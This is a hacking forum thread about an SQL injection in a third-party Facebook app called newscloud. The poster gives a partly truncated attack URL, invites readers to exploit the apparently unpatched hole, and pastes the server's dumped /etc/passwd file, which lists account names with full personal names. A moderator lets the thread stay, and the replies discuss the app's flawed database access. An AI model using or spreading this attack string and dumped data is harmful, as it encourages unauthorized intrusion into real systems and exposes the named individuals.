Facebook SQL Injection

[crim]

**t34b4g5's Edit, i am allowing this thread to remain, see post below ***


I'm not sure if i'm allowed to post this here, if this is against the rules just remove the thread

A team member discovered this a few weeks ago and it still seems to be unpatched

Be my guest and play a little with them, a site big as Facebook should be aware of security, hopefully their box is hardened
***Click at your own Risk***
http://apps.facebook.com/newscloud/?...737764%29,10--
***Click at your own Risk***

Code:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash
jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:102:104::/var/spool/exim4:/bin/false
statd:x:103:65534::/var/lib/nfs:/bin/false
identd:x:104:65534::/var/run/identd:/bin/false
adam:x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash
rick:x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash
russell:x:1005:1005:Russell Branca,,,:/home/russell:/bin/bash
daniel:x:1006:1006:Daniel MacDonald,,,:/home/daniel:/bin/bash
postfix:x:105:106::/var/spool/postfix:/bin/false 4

[t34b4g5]

Greetz..

Nice thread, wish there were more type's of threads like this being posted.

anyhow i am letting this thread stay. Simply because these arn't the freshest POC's floating atm.

So until they are rendered useless don't be silly and get yourself raided by the FBI'z

[d34dl0k1]

actually, what you've found is a injection in a third party app on Facebook

http://developers.facebook.com/

apps.facebook.com is the domain name, but that's not their data.

[souleman]

Considering what the 3rd party app is (newscloud), it doesn't really surprise me.

If I remember correctly (been a whild since I looked at it), there is a problem with the facebook API that allows any member to post their own information. Instead of setting it up like the members are contributers, it is set up like they are members, so "need" direct access to the database. Even if facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on facebook.